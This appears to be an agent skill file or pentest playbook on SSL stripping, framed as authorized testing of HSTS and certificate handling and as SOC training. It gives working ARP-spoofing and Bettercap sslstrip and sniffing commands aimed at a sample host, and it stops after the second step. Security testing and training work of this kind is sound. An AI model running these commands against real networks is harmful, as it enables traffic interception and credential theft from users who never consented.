| name | performing-ssl-stripping-attack |
| description | Simulates SSL stripping / HTTPS downgrade attacks using sslstrip, Bettercap, and mitmproxy in authorized lab environments to test HSTS enforcement, certificate validation, and HTTPS upgrade mechanisms. Use when performing an authorized penetration test to validate HSTS preloading and TLS certificate handling, demonstrate downgrade-attack risk to stakeholders, or train SOC teams to detect SSL stripping indicators in network traffic. |
| domain | cybersecurity |
| subdomain | network-security |
| tags | ["network-security","ssl-stripping","https","hsts","tls-security"] |
| version | 1.0 |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | ["PR.IR-01","DE.CM-01","ID.AM-03","PR.DS-02"] |
| mitre_attack | ["T1046","T1040","T1557","T1071","T1573"] |
Performing SSL Stripping Attack
When to Use
- Testing whether web applications properly enforce HTTPS through HSTS headers and redirect chains
- Validating that HSTS preloading is correctly configured and registered in browser preload lists
- Demonstrating the risk of cleartext HTTP to stakeholders during authorized security assessments
- Assessing whether internal applications and thick clients validate TLS certificates and reject downgrades
- Training SOC teams to detect SSL stripping indicators in network traffic
Do not use against networks or applications without explicit written authorization, to intercept real user credentials, or against production systems during business hours without change management approval.
Prerequisites
- Written authorization specifying in-scope applications and approved attack techniques
- Bettercap 2.x or sslstrip2 installed on the attacker machine
- ARP spoofing or other MITM positioning established (see ARP spoofing skill)
- IP forwarding enabled on the attacker machine
- Wireshark for verifying attack success and capturing evidence
- Test accounts (not real user credentials) for demonstrating credential interception
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
Workflow
Step 1: Establish MITM Position
sudo sysctl -w net.ipv4.ip_forward=1
sudo bettercap -iface eth0 -eval "set arp.spoof.targets 192.168.1.50; arp.spoof on"
sudo arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.1 &
Step 2: Execute SSL Stripping with Bettercap
sudo bettercap -iface eth0
> set arp.spoof.targets 192.168.1.50
> set arp.spoof.fullduplex true
> arp.spoof on
> http.proxy.sslstrip
> http.proxy.port 8080
> http.proxy on
> net.sniff.verbose
> net.sniff on